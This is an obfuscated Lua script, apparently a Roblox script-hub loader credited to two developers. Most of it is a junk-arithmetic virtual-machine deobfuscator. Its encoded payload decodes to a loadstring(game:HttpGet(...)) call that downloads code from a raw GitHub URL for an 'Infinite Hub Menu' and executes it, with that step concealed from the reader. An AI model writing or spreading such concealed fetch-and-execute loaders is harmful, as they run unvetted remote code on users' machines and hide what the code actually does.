

----------------------------------------------------
--     Devs  =  { Darkzin and Cool }              --
--     Have Fun :)                                --
----------------------------------------------------


--// Script Version 6.6


do local v0=0;local v1;local v2;local v3;local v4;local v5;local v6;local v7;local v8;local v9;local v10;local v11;local v12;local v13;local v14;local v15;while true do if (v0==1) then v5=string.gsub;v6=string.rep;v7=table.concat;v8=table.insert;v0=2;end if (v0==2) then v9=getfenv or function()return _ENV;end;v10=setmetatable;v11=pcall;v12=select;v0=3;end if (v0==3) then v13=unpack or table.unpack;v14=tonumber;v15=nil;v15=function(v23,v24,...)local v25=0;local v26;local v27;local v28;local v29;local v30;local v31;local v32;local v33;local v34;local v35;local v36;local v37;while true do if (v25==3) then v31=nil;v31=function()local v46,v47,v48,v49=v2(v23,v26,v26 + ((1090 -(204 + 868)) -(10 + 5)));v26=v26 + (13 -9);return (v49 * (4576125 + 3957793 + 8243298)) + (v48 * (65763 -(176 + 51))) + (v47 * 256) + v46;end;v32=nil;v25=4;end if (v25==4) then v32=function()local v50=v31();local v51=v31();return (( -(1 + 1) * v28(v51,1717 -(1161 + 524))) + (1053 -(609 + 443))) * ((8 -6)^(v28(v51,21,1144 -(1050 + (1648 -(1243 + 342)))) -(807 + 216))) * ((((v28(v51,3 -2,32 -12) * ((2 + 0)^(48 -16))) + v50)/(2^(827 -(605 + 170)))) + (519 -((447 -223) + 294)));end;v33=nil;v33=function(v38)local v52;if  not v38 then local v73=80 -(16 + 64);while true do if (v73==(330 -(251 + 79))) then v38=v31();if (v38==(0 -0)) then return "";end break;end end end v52=v4(v23,v26,(v26 + v38) -1);v26=v26 + v38;local v53={};for v71=1 + 0, #v52 do v53[v71]=v3(v2(v4(v52,v71,v71)));end return v7(v53);end;v25=5;end if (v25==5) then v34=v31;v35=nil;v35=function(...)return {...},v12("#",...);end;v25=6;end if (v25==1) then v28=nil;v28=function(v39,v40,v41)if v41 then local v74=(v39/((2 + 0)^(v40-(1 + 0 + 0))))%(2^(((v41-(4 -3)) -(v40-1)) + ((4272 -2427) -(611 + 1233))));return v74-(v74%(3 -(6 -4)));else local v75=847 -(314 + 533);local v76;while true do if (v75==(0 + 0 + 0)) then v76=(661 -(445 + 214))^(v40-((7327 -5483) -(199 + 1644)));return (((v39%(v76 + v76))>=v76) and 1) or 0;end end end end;v29=nil;v25=2;end if (v25==7) then v37=function(v42,v43,v44)local v54=0;local v55;local v56;local v57;while true do if (v54==1) then v57=v42[3];return function(...)local v82=1;local v83= -1;local v84={...};local v85=v12("#",...) -1;local function v86()local v91=v55;local v92=v56;local v93=v57;local v94=v35;local v95={};local v96={};local v97={};for v105=0 + 0,v85 do if (((3015 -(282 + 260))==(3077 -(448 + 156))) and (v105>=v93)) then v95[v105-v93]=v84[v105 + (135 -(101 + 33))];else v97[v105]=v84[v105 + ((2501 -(53 + 1617)) -(471 + 359))];end end local v98=(v85-v93) + 1;local v99;local v100;while true do local v106=899 -(61 + (2109 -1271));while true do if (((20671 -16285)>(3924 -1934)) and (v106==(60 -(27 + 33)))) then local v111=0 + 0;while true do if ((v111==(1 + 0)) or (4281<(1703 -(959 + 249)))) then v106=765 -(443 + 321);break;end if ((v111==(0 + 0 + 0)) or ((2143 -(87 + 987))>(2204 + 615))) then v99=v91[v82];v100=v99[1 + 0];v111=1 + 0;end end end if ((v106==1) or ((1795 -(364 + 175))>(5481 -(940 + 309)))) then if ((v100<=(2 -0)) or ((930 + 3248)>=(1784 + 2979))) then if (((1559 + (2479 -(1296 + 513)))==(604 + 1625)) and (v100<=(752 -(247 + 505)))) then v97[v99[1 + 1]]();elseif (((468 -236)<=((2977 -1983) -275)) and (v100==((1470 -(4 + 170)) -(914 + 381)))) then do return;end else local v116=0 -0;local v117;local v118;while true do if (((1 + 0)==v116) or ((7465 -4835)==(14809 -11360))) then v97[v117 + (228 -(218 + 9))]=v118;v97[v117]=v118[v99[3 + 1]];break;end if ((((6637 -(433 + 585)) -2118)==(2148 + 1353)) and (v116==(867 -(614 + 253)))) then local v137=1086 -(943 + 143);while true do if (((1927 -(504 + (627 -(6 + 523))))<=(1160 + 1844)) and (v137==(0 -0))) then v117=v99[413 -(375 + 36)];v118=v97[v99[843 -(654 + 186)]];v137=(27 + 10) -(31 + 5);end if ((v137==(1 + 0)) or ((2469 -((514 -276) + 857))<=(106 + 700))) then v116=1784 -(131 + 1652);break;end end end end end elseif ((v100<=(18 -14)) or ((8272 -6129)>=(8370 -4419))) then if ((v100==(8 -5)) or (((2373 -1660) -502)==1008)) then local v119=0 + 0;local v120;local v121;local v122;local v123;local v124;while true do if (((890 -508)<=(4100 -(285 + 1291))) and (v119==((0 -0) -0))) then v120=262 -(72 + 190);v121=nil;v119=1211 -(69 + 1141);end if (((4385 -2798)==(2340 -(220 + (1742 -(609 + 600))))) and (v119==(229 -(54 + 173)))) then v124=nil;while true do if (((4907 -(1394 + 495))>(1132 -(243 + 87))) and ((1 + 1)==v120)) then for v145=v121,v83 do local v146=0 + 0;while true do if (((709 + (4074 -1840))<=(800 + 3792)) and (v146==((1974 -(495 + 1479)) + 0))) then v124=v124 + (2 -1);v97[v145]=v122[v124];break;end end end break;end if ((v120==(1 + 0)) or ((953 + 3957)==(4143 -(791 + 484)))) then local v141=0 + 0;while true do if ((1713<(3407 -(214 + 655))) and (v141==(55 -(19 + 35)))) then v120=(473 -(83 + 388)) + 0;break;end if (((771 + 80)>=(292 + 279)) and (v141==(0 + 0))) then v83=(v123 + v121) -(2 -(1460 -(783 + 676)));v124=0 -0;v141=1 -0;end end end if (((789 -(59 + 225))<(219 + 387)) and (v120==(0 + 0))) then local v142=0 -(200 -(98 + 102));while true do if (((1383 -235)==(1677 -529)) and (v142==(1 + 0))) then v120=4 -(3 + 0);break;end if ((v142==(0 + 0)) or ((2048 -859)>(1458 -(14 + 20)))) then v121=v99[2 + 0 + 0];v122,v123=v94(v97[v121](v13(v97,v121 + (1 -0),v99[3 + 0])));v142=(1 -0) -0;end end end end break;end if ((v119==(2 -1)) or ((299 + 345)>=(5069 -2079))) then v122=nil;v123=nil;v119=645 -(315 + 328);end end else local v125=0 -0;local v126;local v127;while true do if (((19 + 72 + 2380)>((5231 -2561) -1609)) and (v125==(1 + 0))) then while true do if (((3116 -(499 + 1434))==(3126 -(1470 + 473))) and ((0 + (1426 -(180 + 1246)))==v126)) then v127=v99[1004 -(638 + 364)];v97[v127]=v97[v127](v13(v97,v127 + ((841 -(350 + 488)) -2),v83));break;end end break;end if (((4656 -3138)<=2474) and ((0 + 0)==v125)) then v126=(0 + 0) -0;v127=nil;v125=(73 -(33 + 39)) + 0;end end end elseif ((v100>(7 -2)) or ((229 + 1056)>(2763 + 1037))) then v97[v99[5 -3]]=v99[14 -(51 -40)];else v97[v99[7 -(977 -(150 + 822))]]=v44[v99[1935 -(1398 + 534)]];end v82=v82 + 1 + (0 -0);break;end end end end A,B=v35(v11(v86));if  not A[1] then local v101=v42[4][v82] or "?";error("Script error at ["   .. v101   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end if (v54==0) then v55=v42[1];v56=v42[2];v54=1;end end end;return v37(v36(),{},v24)(...);end if (v25==0) then v26=1;v27=nil;v23=v5(v4(v23,5),"..",function(v45)if (v2(v45,2)==79) then v27=v1(v4(v45,1,1));return "";else local v77=v3(v1(v45,16));if v27 then local v81=v6(v77,v27);v27=nil;return v81;else return v77;end end end);v25=1;end if (2==v25) then v29=function()local v58=v2(v23,v26,v26);v26=v26 + 1;return v58;end;v30=nil;v30=function()local v59=0;local v60;local v61;while true do if (v59==(1 + 0)) then return (v61 * (2001 -(790 + 955))) + v60;end if (v59==(0 -(1064 -(388 + 676)))) then v60,v61=v2(v23,v26,v26 + 2 + 0);v26=v26 + (4 -2);v59=694 -(53 + 640);end end end;v25=3;end if (v25==6) then v36=nil;v36=function()local v62=1318 -(399 + 919);local v63;local v64;local v65;local v66;local v67;local v68;local v69;local v70;while true do if ((90 -(46 + 43))==v62) then v65=nil;v66=nil;v62=2 -0;end if (v62~=0) then else v63=1574 -(305 + 1269);v64=nil;v62=1916 -(1592 + 323);end if ((3 -1)==v62) then v67=nil;v68=nil;v62=1187 -(1075 + 109);end if (v62~=(4 + 0)) then else while true do if (v63~=(1 + 0)) then else local v87=0 -0;while true do if (v87==(4 -3)) then v63=1 + 1;break;end if (v87~=(309 -(78 + 231))) then else v66=nil;v67=nil;v87=2 -1;end end end if ((12 -9)~=v63) then else v70=nil;while true do local v102=0;local v103;local v104;while true do if (v102==(1013 -(386 + 626))) then while true do if (v103~=0) then else v104=0;while true do if (v104~=1) then else if (v64~=(1 + 0)) then else local v132=451 -(389 + 62);local v133;while true do if (v132~=(0 -0)) then else v133=0;while true do if (v133==(661 -(67 + 592))) then v64=2 + 0;break;end if (v133~=(1804 -(225 + 1578))) then else for v149=3 -2,v69 do local v150=729 -(517 + 212);local v151;local v152;local v153;while true do if (v150==(2 -1)) then v153=nil;while true do if ((1632 -(1613 + 18))==v151) then if (v152==(167 -(41 + 125))) then v153=v29()~=(1751 -(352 + 1399));elseif (v152==(1 + 1)) then v153=v32();elseif (v152~=(36 -(6 + 27))) then else v153=v33();end v70[v149]=v153;break;end if (v151~=(1852 -(743 + 1109))) then else v152=v29();v153=nil;v151=1;end end break;end if (v150~=(0 + 0)) then else v151=0;v152=nil;v150=13 -(8 + 4);end end end v68[502 -(480 + 19)]=v29();v133=2 + 0;end if (0==v133) then local v148=0 + 0;while true do if (v148~=(0 + 0)) then else v69=v31();v70={};v148=1 + 0;end if ((1371 -(1096 + 274))~=v148) then else v133=1;break;end end end end break;end end end break;end if (v104~=(0 -0)) then else local v114=0;local v115;while true do if (v114~=(1861 -(1267 + 594))) then else v115=396 -(358 + 38);while true do if (v115~=(0 -0)) then else local v138=0 + 0;while true do if (v138==(1931 -(6 + 1924))) then v115=2 -1;break;end if (v138~=(0 -0)) then else if (v64==(1007 -(829 + 176))) then local v157=0 -0;local v158;while true do if (v157==(0 -0)) then v158=513 -(120 + 393);while true do local v163=0 + 0;while true do if (v163~=(0 + 0)) then else if ((1 + 0)~=v158) then else local v164=0 + 0;local v165;while true do if ((0 -0)~=v164) then else v165=0;while true do if (v165~=(386 -(319 + 67))) then else local v170=0;while true do if (v170==(0 + 0)) then for v178=1,v31() do v67[v178]=v31();end return v68;end end end end break;end end end if ((1848 -(1492 + 356))~=v158) then else local v166=0;while true do if (v166~=1) then else v158=1;break;end if (v166~=(1333 -(929 + 404))) then else local v169=0;while true do if (v169~=(1 + 0)) then else v166=1 -0;break;end if (v169~=(0 + 0)) then else for v171=1 + 0,v31() do local v172=1840 -(1156 + 684);local v173;local v174;local v175;while true do if (v172~=(374 -(245 + 128))) then else v175=nil;while true do if (0==v173) then local v180=0 + 0;while true do if (v180==(1127 -(884 + 243))) then v174=451 -(122 + 329);v175=nil;v180=4 -3;end if (v180~=(4 -3)) then else v173=3 -2;break;end end end if (v173==1) then while true do if (v174==(1352 -(26 + 1326))) then v175=v29();if (v28(v175,1,1 + 0)==0) then local v181=0 + 0;local v182;local v183;local v184;local v185;local v186;while true do if (v181~=0) then else v182=0 + 0;v183=nil;v181=1440 -(287 + 1152);end if (v181~=(4 -2)) then else v186=nil;while true do if (v182~=(644 -(312 + 330))) then else while true do if (v183~=(3 + 0)) then else if (v28(v185,11 -8,303 -(207 + 93))~=(904 -(807 + 96))) then else v186[1105 -(345 + 756)]=v70[v186[1942 -(607 + 1331)]];end v65[v171]=v186;break;end if (v183~=(1098 -(998 + 100))) then else local v190=0;local v191;while true do if (v190~=(350 -(233 + 117))) then else v191=650 -(400 + 250);while true do if (v191~=(2 -1)) then else v183=3 -2;break;end if (v191==(0 -0)) then local v200=637 -(232 + 405);while true do if (v200==1) then v191=1;break;end if (v200==0) then v184=v28(v175,1 + 1,3);v185=v28(v175,10 -6,6 + 0);v200=1;end end end end break;end end end if (v183==2) then local v192=0 + 0;local v193;while true do if (v192==(49 -(42 + 7))) then v193=0;while true do if (v193~=1) then else v183=2 + 1;break;end if (v193~=(0 -0)) then else if (v28(v185,1,1)==(3 -2)) then v186[179 -(126 + 51)]=v70[v186[2]];end if (v28(v185,2,2)==(498 -(182 + 315))) then v186[2 + 1]=v70[v186[1349 -(234 + 1112)]];end v193=1;end end break;end end end if (v183==(1010 -(905 + 104))) then local v194=0 -0;local v195;local v196;while true do if (v194==(857 -(741 + 115))) then while true do if (v195~=(953 -(243 + 710))) then else v196=0 -0;while true do if (v196~=(163 -(15 + 148))) then else local v205=655 -(104 + 551);while true do if (v205==(1021 -(785 + 236))) then v186={v30(),v30(),nil,nil};if (v184==(963 -(188 + 775))) then local v206=0 -0;local v207;local v208;while true do if (v206~=1) then else while true do if (v207==0) then v208=0 + 0;while true do if (v208==(376 -(77 + 299))) then v186[3 + 0]=v30();v186[2 + 2]=v30();break;end end break;end end break;end if (v206==(0 + 0)) then v207=0;v208=nil;v206=563 -(76 + 486);end end elseif (v184==1) then v186[1349 -(880 + 466)]=v31();elseif (v184==2) then v186[1705 -(1609 + 93)]=v31() -((2 -0)^(5 + 11));elseif (v184~=(10 -7)) then else local v211=0;local v212;local v213;while true do if (v211==(1237 -(778 + 459))) then v212=0;v213=nil;v211=2 -1;end if (v211~=(3 -2)) then else while true do if (v212~=(0 -0)) then else v213=0 -0;while true do if (v213==(0 -0)) then v186[3]=v31() -((2 + 0)^16);v186[8 -4]=v30();break;end end break;end end break;end end end v205=1 + 0;end if (v205==(1310 -(1220 + 89))) then v196=1275 -(560 + 714);break;end end end if (v196~=(1 + 0)) then else v183=1 + 1;break;end end break;end end break;end if (v194==(1466 -(862 + 604))) then v195=0 -0;v196=nil;v194=59 -(53 + 5);end end end end break;end if (v182~=(0 -0)) then else local v187=0 + 0;while true do if (v187~=(0 + 0)) then else local v197=0 -0;while true do if (v197==(0 -0)) then v183=0 + 0;v184=nil;v197=1;end if (v197==(1212 -(288 + 923))) then v187=1;break;end end end if (v187~=(1 + 0)) then else v182=592 -(94 + 497);break;end end end if ((1185 -(719 + 465))==v182) then local v188=1290 -(780 + 510);while true do if (0~=v188) then else v185=nil;v186=nil;v188=1080 -(23 + 1056);end if ((3 -2)~=v188) then else v182=526 -(265 + 259);break;end end end end break;end if (v181==1) then v184=nil;v185=nil;v181=2 -0;end end end break;end end break;end end break;end if (v172==(0 + 0)) then v173=0;v174=nil;v172=1755 -(836 + 918);end end end for v176=1 + 0,v31() do v66[v176-1]=v36();end v169=1;end end end end end break;end end end break;end end end if (v64~=(0 + 0)) then else local v159=0;local v160;local v161;while true do if (v159==(0 -0)) then v160=0 -0;v161=nil;v159=1;end if (v159~=(581 -(520 + 60))) then else while true do if (0==v160) then v161=0;while true do if (v161~=(0 -0)) then else local v167=0 + 0;while true do if (v167==(3 -2)) then v161=1 + 0;break;end if (v167==0) then v65={};v66={};v167=2 -1;end end end if (v161==1) then local v168=891 -(332 + 559);while true do if (v168==(0 + 0)) then v67={};v68={v65,v66,nil,v67};v168=1 -0;end if (v168==(1 + 0)) then v161=2;break;end end end if (v161==2) then v64=2 -1;break;end end break;end end break;end end end v138=1 + 0;end end end if (v115==(1901 -(422 + 1478))) then v104=16 -(12 + 3);break;end end break;end end end end break;end end break;end if ((1730 -(831 + 899))~=v102) then else v103=1893 -(495 + 1398);v104=nil;v102=1 + 0;end end end break;end if (v63==0) then local v88=1854 -(1765 + 89);local v89;while true do if (v88==0) then v89=165 -(156 + 9);while true do if (v89~=(1552 -(965 + 586))) then else v63=3 -2;break;end if (v89~=(0 + 0)) then else v64=1466 -(563 + 903);v65=nil;v89=2 -1;end end break;end end end if (v63==(7 -5)) then local v90=0 + 0;while true do if (v90==0) then v68=nil;v69=nil;v90=20 -(16 + 3);end if (v90==(1 -0)) then v63=753 -(240 + 510);break;end end end end break;end if ((1 + 2)==v62) then v69=nil;v70=nil;v62=4;end end end;v37=nil;v25=7;end end end;v0=4;end if (v0==4) then v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034F3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F58496E66696E6974654875622F74657374652F6D61696E2F496E66696E6974652532304875622532304D656E7500083O0012053O00013O001205000100023O002002000100010003001206000300044O0003000100034O00045O00026O000100012O00013O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);break;end if (v0==0) then v1=tonumber;v2=string.byte;v3=string.char;v4=string.sub;v0=1;end end end
